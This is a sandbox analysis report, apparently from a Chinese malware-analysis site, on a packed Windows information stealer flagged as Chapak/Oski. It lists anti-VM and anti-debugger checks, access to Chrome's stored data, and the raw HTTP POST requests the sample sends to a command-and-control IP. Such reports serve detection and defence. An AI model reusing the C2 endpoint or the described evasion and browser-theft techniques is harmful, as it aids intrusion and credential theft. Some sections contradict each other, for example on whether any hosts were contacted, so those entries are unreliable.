10.4
0-day

7a445143a652f58fa4abc4957269aea8f884f71e7f4654b56385491eb544b0a5

53c17933cc04257325bdf9602d5d418d.exe

分析耗时

25s

最近分析

文件大小

2.3MB
静态报毒 动态报毒 0@A8RPXWHI 100% AI SCORE=100 AIDETECT ARTEMIS ATTRIBUTE CHAPAK CLOUD CONFIDENCE EMYR GENERICKD HIGH CONFIDENCE HIGHCONFIDENCE HNEODT KCLOUD KVMH008 MALWARE1 MALWARE@#OT5V0GK88CNO NTBRNLD7X58 OSKI POSSIBLETHREAT PREPSCRAM QVM19 R345990 RRFDG SAVE SCORE SOFTWAREBUNDLER STATIC AI SUSGEN SUSPICIOUS PE SWKV THEMIDA UNSAFE ZEXAF 更多
鹰眼引擎
未检测 暂无鹰眼引擎检测结果
静态判定
反病毒引擎
查杀引擎 查杀结果 查杀时间 查杀版本
Alibaba Trojan:Win32/Chapak.3a51f688 20190527 0.3.0.5
Baidu 20190318 1.0.0.2
Avast Win32:Trojan-gen 20210309 21.1.5827.0
Kingsoft Win32.Heur.KVMH008.a.(kcloud) 20210309 2017.9.26.565
McAfee Artemis!53C17933CC04 20210309 6.0.6.653
Tencent Win32.Trojan.Chapak.Swkv 20210309 1.0.0.1
CrowdStrike win/malicious_confidence_100% (W) 20210203 1.0
静态指标
Queries for the computername (1 个事件)
Time & API Arguments Status Return Repeated
1619426985.925605
GetComputerNameA
computer_name: OSKAR-PC
success 1 0
The executable contains unknown PE section names indicative of a packer (could be a false positive) (7 个事件)
section
section .imports
section .vmp0
section .themida
section .loadcon
section .boot
section .vmp1
One or more processes crashed (4 个事件)
Time & API Arguments Status Return Repeated
1619426984.503605
__exception__
stacktrace:
53c17933cc04257325bdf9602d5d418d+0x484533 @ 0x814533
53c17933cc04257325bdf9602d5d418d+0x4845d0 @ 0x8145d0

registers.esp: 2816832
registers.edi: 5652480
registers.eax: 2816832
registers.ebp: 2816912
registers.edx: 2130566132
registers.ebx: 0
registers.esi: 2010805291
registers.ecx: 3745120256
exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b
exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727
exception.instruction: leave
exception.module: KERNELBASE.dll
exception.exception_code: 0xc000008e
exception.offset: 46887
exception.address: 0x778eb727
success 0 0
1619426984.909605
__exception__
stacktrace:

                
            
            
            
registers.esp: 2816952
registers.edi: 12856842
registers.eax: 1750617430
registers.ebp: 5652480
registers.edx: 22614
registers.ebx: 0
registers.esi: 7140130
registers.ecx: 20
exception.instruction_r: ed 64 8f 05 00 00 00 00 83 c4 04 e9 ca 83 e8 ff
exception.symbol: 53c17933cc04257325bdf9602d5d418d+0x4aebe7
exception.instruction: in eax, dx
exception.module: 53c17933cc04257325bdf9602d5d418d.exe
exception.exception_code: 0xc0000096
exception.offset: 4910055
exception.address: 0x83ebe7
success 0 0
1619426984.909605
__exception__
stacktrace:

                
            
            
            
registers.esp: 2816952
registers.edi: 12856842
registers.eax: 1447909480
registers.ebp: 5652480
registers.edx: 22104
registers.ebx: 2256917605
registers.esi: 7140130
registers.ecx: 10
exception.instruction_r: ed 64 8f 05 00 00 00 00 83 c4 04 81 fb 68 58 4d
exception.symbol: 53c17933cc04257325bdf9602d5d418d+0x4aec5b
exception.instruction: in eax, dx
exception.module: 53c17933cc04257325bdf9602d5d418d.exe
exception.exception_code: 0xc0000096
exception.offset: 4910171
exception.address: 0x83ec5b
success 0 0
1619426991.706605
__exception__
stacktrace:
53c17933cc04257325bdf9602d5d418d+0x1e87d @ 0x3ae87d
53c17933cc04257325bdf9602d5d418d+0x1e94c @ 0x3ae94c
53c17933cc04257325bdf9602d5d418d+0x1eba0 @ 0x3aeba0
53c17933cc04257325bdf9602d5d418d+0x1ec51 @ 0x3aec51
53c17933cc04257325bdf9602d5d418d+0x2106d @ 0x3b106d
53c17933cc04257325bdf9602d5d418d+0x21419 @ 0x3b1419
53c17933cc04257325bdf9602d5d418d+0x7128 @ 0x397128
0x2afc00

registers.esp: 2756972
registers.edi: 376
registers.eax: 2757056
registers.ebp: 2757632
registers.edx: 2757596
registers.ebx: 2
registers.esi: 0
registers.ecx: 44307864
exception.symbol:
exception.exception_code: 0xc0000005
exception.address: 0x0
success 0 0
行为判定
动态指标
HTTP traffic contains suspicious features which may be indicative of malware related traffic (7 个事件)
suspicious_features POST method with no referer header, POST method with no useragent header, Connection to IP address suspicious_request POST http://199.192.24.69/b4kYUOYBvbk44//softokn3.dll
suspicious_features POST method with no referer header, POST method with no useragent header, Connection to IP address suspicious_request POST http://199.192.24.69/b4kYUOYBvbk44//sqlite3.dll
suspicious_features POST method with no referer header, POST method with no useragent header, Connection to IP address suspicious_request POST http://199.192.24.69/b4kYUOYBvbk44//freebl3.dll
suspicious_features POST method with no referer header, POST method with no useragent header, Connection to IP address suspicious_request POST http://199.192.24.69/b4kYUOYBvbk44//mozglue.dll
suspicious_features POST method with no referer header, POST method with no useragent header, Connection to IP address suspicious_request POST http://199.192.24.69/b4kYUOYBvbk44//msvcp140.dll
suspicious_features POST method with no referer header, POST method with no useragent header, Connection to IP address suspicious_request POST http://199.192.24.69/b4kYUOYBvbk44//nss3.dll
suspicious_features POST method with no referer header, POST method with no useragent header, Connection to IP address suspicious_request POST http://199.192.24.69/b4kYUOYBvbk44//vcruntime140.dll
Performs some HTTP requests (7 个事件)
request POST http://199.192.24.69/b4kYUOYBvbk44//softokn3.dll
request POST http://199.192.24.69/b4kYUOYBvbk44//sqlite3.dll
request POST http://199.192.24.69/b4kYUOYBvbk44//freebl3.dll
request POST http://199.192.24.69/b4kYUOYBvbk44//mozglue.dll
request POST http://199.192.24.69/b4kYUOYBvbk44//msvcp140.dll
request POST http://199.192.24.69/b4kYUOYBvbk44//nss3.dll
request POST http://199.192.24.69/b4kYUOYBvbk44//vcruntime140.dll
Sends data using the HTTP POST Method (7 个事件)
request POST http://199.192.24.69/b4kYUOYBvbk44//softokn3.dll
request POST http://199.192.24.69/b4kYUOYBvbk44//sqlite3.dll
request POST http://199.192.24.69/b4kYUOYBvbk44//freebl3.dll
request POST http://199.192.24.69/b4kYUOYBvbk44//mozglue.dll
request POST http://199.192.24.69/b4kYUOYBvbk44//msvcp140.dll
request POST http://199.192.24.69/b4kYUOYBvbk44//nss3.dll
request POST http://199.192.24.69/b4kYUOYBvbk44//vcruntime140.dll
Allocates read-write-execute memory (usually to unpack itself) (6 个事件)
Time & API Arguments Status Return Repeated
1619426984.362605
NtProtectVirtualMemory
process_identifier: 284
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 8192
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
base_address: 0x77dcf000
success 0 0
1619426984.378605
NtProtectVirtualMemory
process_identifier: 284
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 8192
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
base_address: 0x77d40000
success 0 0
1619426985.472605
NtProtectVirtualMemory
process_identifier: 284
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
base_address: 0x003be000
success 0 0
1619426985.472605
NtProtectVirtualMemory
process_identifier: 284
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
base_address: 0x003b7000
success 0 0
1619426985.472605
NtProtectVirtualMemory
process_identifier: 284
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
base_address: 0x003b7000
success 0 0
1619426985.643605
NtProtectVirtualMemory
process_identifier: 284
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 32768
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
base_address: 0x003b7000
success 0 0
Steals private information from local Internet browsers (1 个事件)
file C:\Users\Administrator.Oskar-PC\AppData\Local\Google\Chrome\User Data\Local State
Creates executable files on the filesystem (7 个事件)
file C:\ProgramData\sqlite3.dll
file C:\ProgramData\freebl3.dll
file C:\ProgramData\msvcp140.dll
file C:\ProgramData\nss3.dll
file C:\ProgramData\vcruntime140.dll
file C:\ProgramData\mozglue.dll
file C:\ProgramData\softokn3.dll
Checks adapter addresses which can be used to detect virtual network interfaces (1 个事件)
Time & API Arguments Status Return Repeated
1619426986.753605
GetAdaptersAddresses
flags: 0
family: 0
failed 111 0
The binary likely contains encrypted or compressed data indicative of a packer (11 个事件)
entropy 7.997267464059673 section {'size_of_data': '0x00010249', 'virtual_address': '0x00001000', 'entropy': 7.997267464059673, 'name': ' ', 'virtual_size': '0x00025763'} description A section with a high entropy has been found
entropy 7.983912641712787 section {'size_of_data': '0x00002c89', 'virtual_address': '0x00027000', 'entropy': 7.983912641712787, 'name': ' ', 'virtual_size': '0x00007d78'} description A section with a high entropy has been found
entropy 7.752986695593336 section {'size_of_data': '0x00000323', 'virtual_address': '0x0002f000', 'entropy': 7.752986695593336, 'name': ' ', 'virtual_size': '0x000043c8'} description A section with a high entropy has been found
entropy 7.999548445666599 section {'size_of_data': '0x0005b60f', 'virtual_address': '0x00034000', 'entropy': 7.999548445666599, 'name': ' ', 'virtual_size': '0x00089550'} description A section with a high entropy has been found
entropy 7.96933748766608 section {'size_of_data': '0x0000194d', 'virtual_address': '0x000be000', 'entropy': 7.96933748766608, 'name': ' ', 'virtual_size': '0x000021cc'} description A section with a high entropy has been found
entropy 7.999168298855208 section {'size_of_data': '0x00035463', 'virtual_address': '0x000c1000', 'entropy': 7.999168298855208, 'name': ' ', 'virtual_size': '0x000dde96'} description A section with a high entropy has been found
entropy 7.9992443992387 section {'size_of_data': '0x00033800', 'virtual_address': '0x001a0000', 'entropy': 7.9992443992387, 'name': '.vmp0', 'virtual_size': '0x00033800'} description A section with a high entropy has been found
entropy 7.957961351131541 section {'size_of_data': '0x00134c00', 'virtual_address': '0x004f5000', 'entropy': 7.957961351131541, 'name': '.boot', 'virtual_size': '0x00134c00'} description A section with a high entropy has been found
entropy 7.506238099464433 section {'size_of_data': '0x00000600', 'virtual_address': '0x0062a000', 'entropy': 7.506238099464433, 'name': '.vmp1', 'virtual_size': '0x000005d0'} description A section with a high entropy has been found
entropy 7.516709986497975 section {'size_of_data': '0x00000600', 'virtual_address': '0x0062b000', 'entropy': 7.516709986497975, 'name': '.vmp0', 'virtual_size': '0x000005d0'} description A section with a high entropy has been found
entropy 0.9102867884122687 description Overall entropy of this PE file is high
The executable is likely packed with VMProtect (3 个事件)
section .vmp0 description Section name indicates VMProtect
section .vmp1 description Section name indicates VMProtect
section .vmp0 description Section name indicates VMProtect
网络通信
Communicates with host for which no DNS query was performed (2 个事件)
host 172.217.24.14
host 199.192.24.69
Checks for the presence of known windows from debuggers and forensic tools (21 个事件)
Time & API Arguments Status Return Repeated
1619426984.722605
FindWindowA
class_name: FilemonClass
window_name:
failed 0 0
1619426984.722605
FindWindowA
class_name: FilemonClass
window_name:
failed 0 0
1619426984.800605
FindWindowA
class_name: File Monitor - Sysinternals: www.sysinternals.com
window_name:
failed 0 0
1619426984.831605
FindWindowA
class_name: PROCMON_WINDOW_CLASS
window_name:
failed 0 0
1619426984.831605
FindWindowA
class_name: Process Monitor - Sysinternals: www.sysinternals.com
window_name:
failed 0 0
1619426984.909605
FindWindowA
class_name: RegmonClass
window_name:
failed 0 0
1619426984.909605
FindWindowA
class_name: RegmonClass
window_name:
failed 0 0
1619426984.925605
FindWindowA
class_name: Registry Monitor - Sysinternals: www.sysinternals.com
window_name:
failed 0 0
1619426984.925605
FindWindowA
class_name: 18467-41
window_name:
failed 0 0
1619426988.893605
FindWindowA
class_name: Regmonclass
window_name:
failed 0 0
1619426988.893605
FindWindowA
class_name: Regmonclass
window_name:
failed 0 0
1619426989.206605
FindWindowA
class_name: 18467-41
window_name:
failed 0 0
1619426989.518605
FindWindowA
class_name: Filemonclass
window_name:
failed 0 0
1619426989.518605
FindWindowA
class_name: Filemonclass
window_name:
failed 0 0
1619426989.518605
FindWindowA
class_name: PROCMON_WINDOW_CLASS
window_name:
failed 0 0
1619426993.518605
FindWindowA
class_name: Regmonclass
window_name:
failed 0 0
1619426993.518605
FindWindowA
class_name: Regmonclass
window_name:
failed 0 0
1619426993.831605
FindWindowA
class_name: 18467-41
window_name:
failed 0 0
1619426994.143605
FindWindowA
class_name: Filemonclass
window_name:
failed 0 0
1619426994.143605
FindWindowA
class_name: Filemonclass
window_name:
failed 0 0
1619426994.143605
FindWindowA
class_name: PROCMON_WINDOW_CLASS
window_name:
failed 0 0
Checks the version of Bios, possibly for anti-virtualization (2 个事件)
registry HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion
registry HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion
Sets or modifies WPAD proxy autoconfiguration file for traffic interception (15 个事件)
Time & API Arguments Status Return Repeated
1619426989.331605
RegSetValueExA
key_handle: 0x00000378
value: 1
regkey_r: WpadDecisionReason
reg_type: 4 (REG_DWORD)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{40112ABE-63B3-43C3-BE93-1440EE3AF106}\WpadDecisionReason
success 0 0
1619426989.331605
RegSetValueExA
key_handle: 0x00000378
value: ð€Uh³:×
regkey_r: WpadDecisionTime
reg_type: 3 (REG_BINARY)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{40112ABE-63B3-43C3-BE93-1440EE3AF106}\WpadDecisionTime
success 0 0
1619426989.331605
RegSetValueExA
key_handle: 0x00000378
value: 3
regkey_r: WpadDecision
reg_type: 4 (REG_DWORD)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{40112ABE-63B3-43C3-BE93-1440EE3AF106}\WpadDecision
success 0 0
1619426989.331605
RegSetValueExW
key_handle: 0x00000378
value: 网络 2
regkey_r: WpadNetworkName
reg_type: 1 (REG_SZ)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{40112ABE-63B3-43C3-BE93-1440EE3AF106}\WpadNetworkName
success 0 0
1619426989.331605
RegSetValueExA
key_handle: 0x00000390
value: 1
regkey_r: WpadDecisionReason
reg_type: 4 (REG_DWORD)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0a-00-27-00-00-00\WpadDecisionReason
success 0 0
1619426989.331605
RegSetValueExA
key_handle: 0x00000390
value: ð€Uh³:×
regkey_r: WpadDecisionTime
reg_type: 3 (REG_BINARY)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0a-00-27-00-00-00\WpadDecisionTime
success 0 0
1619426989.331605
RegSetValueExA
key_handle: 0x00000390
value: 3
regkey_r: WpadDecision
reg_type: 4 (REG_DWORD)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0a-00-27-00-00-00\WpadDecision
success 0 0
1619426989.362605
RegSetValueExW
key_handle: 0x00000374
value: {40112ABE-63B3-43C3-BE93-1440EE3AF106}
regkey_r: WpadLastNetwork
reg_type: 1 (REG_SZ)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\WpadLastNetwork
success 0 0
1619426989.800605
RegSetValueExA
key_handle: 0x000003e0
value: 1
regkey_r: WpadDecisionReason
reg_type: 4 (REG_DWORD)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{40112ABE-63B3-43C3-BE93-1440EE3AF106}\WpadDecisionReason
success 0 0
1619426989.800605
RegSetValueExA
key_handle: 0x000003e0
value: @h³:×
regkey_r: WpadDecisionTime
reg_type: 3 (REG_BINARY)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{40112ABE-63B3-43C3-BE93-1440EE3AF106}\WpadDecisionTime
success 0 0
1619426989.800605
RegSetValueExA
key_handle: 0x000003e0
value: 0
regkey_r: WpadDecision
reg_type: 4 (REG_DWORD)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{40112ABE-63B3-43C3-BE93-1440EE3AF106}\WpadDecision
success 0 0
1619426989.800605
RegSetValueExW
key_handle: 0x000003e0
value: 网络 2
regkey_r: WpadNetworkName
reg_type: 1 (REG_SZ)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{40112ABE-63B3-43C3-BE93-1440EE3AF106}\WpadNetworkName
success 0 0
1619426989.800605
RegSetValueExA
key_handle: 0x000003e4
value: 1
regkey_r: WpadDecisionReason
reg_type: 4 (REG_DWORD)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0a-00-27-00-00-00\WpadDecisionReason
success 0 0
1619426989.800605
RegSetValueExA
key_handle: 0x000003e4
value: @h³:×
regkey_r: WpadDecisionTime
reg_type: 3 (REG_BINARY)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0a-00-27-00-00-00\WpadDecisionTime
success 0 0
1619426989.800605
RegSetValueExA
key_handle: 0x000003e4
value: 0
regkey_r: WpadDecision
reg_type: 4 (REG_DWORD)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0a-00-27-00-00-00\WpadDecision
success 0 0
Detects VirtualBox through the presence of a registry key (1 个事件)
registry HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Detects Virtual Machines through their custom firmware (1 个事件)
Time & API Arguments Status Return Repeated
1619426984.690605
NtQuerySystemInformation
information_class: 76 (SystemFirmwareTableInformation)
failed 3221225507 0
Detects VMWare through the in instruction feature (1 个事件)
Time & API Arguments Status Return Repeated
1619426984.909605
__exception__
stacktrace:

                
            
            
            
registers.esp: 2816952
registers.edi: 12856842
registers.eax: 1447909480
registers.ebp: 5652480
registers.edx: 22104
registers.ebx: 2256917605
registers.esi: 7140130
registers.ecx: 10
exception.instruction_r: ed 64 8f 05 00 00 00 00 83 c4 04 81 fb 68 58 4d
exception.symbol: 53c17933cc04257325bdf9602d5d418d+0x4aec5b
exception.instruction: in eax, dx
exception.module: 53c17933cc04257325bdf9602d5d418d.exe
exception.exception_code: 0xc0000096
exception.offset: 4910171
exception.address: 0x83ec5b
success 0 0
Generates some ICMP traffic
File has been identified by 57 AntiVirus engines on VirusTotal as malicious (50 out of 57 个事件)
Bkav W32.AIDetect.malware1
Elastic malicious (high confidence)
MicroWorld-eScan Trojan.GenericKD.34007713
ALYac Trojan.GenericKD.34007713
Cylance Unsafe
Zillya Trojan.Chapak.Win32.86043
Sangfor Trojan.Win32.Save.a
K7AntiVirus Trojan ( 00563cb01 )
Alibaba Trojan:Win32/Chapak.3a51f688
K7GW Trojan ( 00563cb01 )
Cybereason malicious.3cc042
Arcabit Trojan.Generic.D206EAA1
BitDefenderTheta Gen:NN.ZexaF.34608.q!0@a8rPXwhi
Symantec ML.Attribute.HighConfidence
APEX Malicious
Avast Win32:Trojan-gen
ClamAV Win.Trojan.Agent-8036407-0
Kaspersky Trojan.Win32.Chapak.emyr
BitDefender Trojan.GenericKD.34007713
NANO-Antivirus Trojan.Win32.Chapak.hneodt
Paloalto generic.ml
Rising Trojan.Chapak!8.F507 (CLOUD)
Ad-Aware Trojan.GenericKD.34007713
Sophos Mal/Generic-S
Comodo Malware@#ot5v0gk88cno
F-Secure Trojan.TR/Chapak.rrfdg
VIPRE Trojan.Win32.Generic!BT
McAfee-GW-Edition BehavesLike.Win32.Trojan.vc
FireEye Generic.mg.53c17933cc042573
Emsisoft Trojan.Packed (A)
SentinelOne Static AI - Suspicious PE
ESET-NOD32 a variant of Win32/Packed.Themida.HJY
Avira TR/Chapak.rrfdg
MAX malware (ai score=100)
Antiy-AVL Trojan/Win32.Chapak
Kingsoft Win32.Heur.KVMH008.a.(kcloud)
Gridinsoft Trojan.Win32.Injector.dd!n
Microsoft SoftwareBundler:Win32/Prepscram
AegisLab Trojan.Win32.Chapak.4!c
ZoneAlarm Trojan.Win32.Chapak.emyr
GData Trojan.GenericKD.34007713
Cynet Malicious (score: 90)
AhnLab-V3 PUP/Win32.RL_Generic.R345990
Acronis suspicious
McAfee Artemis!53C17933CC04
VBA32 Trojan.Chapak
Malwarebytes Spyware.Oski
Tencent Win32.Trojan.Chapak.Swkv
Yandex Trojan.Themida!ntBrnlD7X58
Ikarus Trojan.Win32.Themida
可视化分析
二进制图像
暂无二进制图像 该样本未生成二进制可视化图像
运行截图
暂无运行截图 该样本运行过程中未生成截图

👋 欢迎使用 ChatHawk

我是您的恶意软件分析助手,可以帮您分析和解读恶意软件报告。请随时向我提问!

🔍 主要威胁分析
⚡ 行为特征
🛡️ 防护建议
🔧 技术手段
🎯 检测方法
🤖

PE Compile Time

2020-06-11 20:20:38

Imports

Library kernel32.dll:
0x59f0b0 GetModuleHandleA
Library USER32.dll:
0x59f0b8 GetDesktopWindow
Library NETAPI32.dll:
0x59f0c0 NetWkstaGetInfo

Hosts

No hosts contacted.

TCP

Source Source Port Destination Destination Port
192.168.56.101 49175 199.192.24.69 80

UDP

Source Source Port Destination Destination Port
192.168.56.101 49235 114.114.114.114 53
192.168.56.101 50534 114.114.114.114 53
192.168.56.101 56539 114.114.114.114 53
192.168.56.101 58367 114.114.114.114 53
192.168.56.101 65004 114.114.114.114 53
192.168.56.101 137 192.168.56.255 137
192.168.56.101 138 192.168.56.255 138
192.168.56.101 123 20.189.79.72 time.windows.com 123
192.168.56.101 53657 224.0.0.252 5355
192.168.56.101 55368 224.0.0.252 5355
192.168.56.101 56804 224.0.0.252 5355
192.168.56.101 60123 224.0.0.252 5355
192.168.56.101 62191 224.0.0.252 5355
192.168.56.101 1900 239.255.255.250 1900
192.168.56.101 56540 239.255.255.250 3702
192.168.56.101 56807 239.255.255.250 1900
192.168.56.101 58368 239.255.255.250 3702
192.168.56.101 58707 239.255.255.250 3702

HTTP & HTTPS Requests

URI Data
http://199.192.24.69/b4kYUOYBvbk44//msvcp140.dll
POST /b4kYUOYBvbk44//msvcp140.dll HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A
Content-Length: 25
Host: 199.192.24.69
Connection: Keep-Alive
Cache-Control: no-cache

--1BEF0A57BE110FD467A--
http://199.192.24.69/b4kYUOYBvbk44//sqlite3.dll
POST /b4kYUOYBvbk44//sqlite3.dll HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A
Content-Length: 25
Host: 199.192.24.69
Connection: Keep-Alive
Cache-Control: no-cache

--1BEF0A57BE110FD467A--
http://199.192.24.69/b4kYUOYBvbk44//softokn3.dll
POST /b4kYUOYBvbk44//softokn3.dll HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A
Content-Length: 25
Host: 199.192.24.69
Connection: Keep-Alive
Cache-Control: no-cache

--1BEF0A57BE110FD467A--
http://199.192.24.69/b4kYUOYBvbk44//vcruntime140.dll
POST /b4kYUOYBvbk44//vcruntime140.dll HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A
Content-Length: 25
Host: 199.192.24.69
Connection: Keep-Alive
Cache-Control: no-cache

--1BEF0A57BE110FD467A--
http://199.192.24.69/b4kYUOYBvbk44//nss3.dll
POST /b4kYUOYBvbk44//nss3.dll HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A
Content-Length: 25
Host: 199.192.24.69
Connection: Keep-Alive
Cache-Control: no-cache

--1BEF0A57BE110FD467A--
http://199.192.24.69/b4kYUOYBvbk44//mozglue.dll
POST /b4kYUOYBvbk44//mozglue.dll HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A
Content-Length: 25
Host: 199.192.24.69
Connection: Keep-Alive
Cache-Control: no-cache

--1BEF0A57BE110FD467A--
http://199.192.24.69/b4kYUOYBvbk44//freebl3.dll
POST /b4kYUOYBvbk44//freebl3.dll HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A
Content-Length: 25
Host: 199.192.24.69
Connection: Keep-Alive
Cache-Control: no-cache

--1BEF0A57BE110FD467A--

ICMP traffic

No ICMP traffic performed.

IRC traffic

No IRC requests performed.

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Snort Alerts

No Snort Alerts

Sorry! No dropped files.
Sorry! No dropped buffers.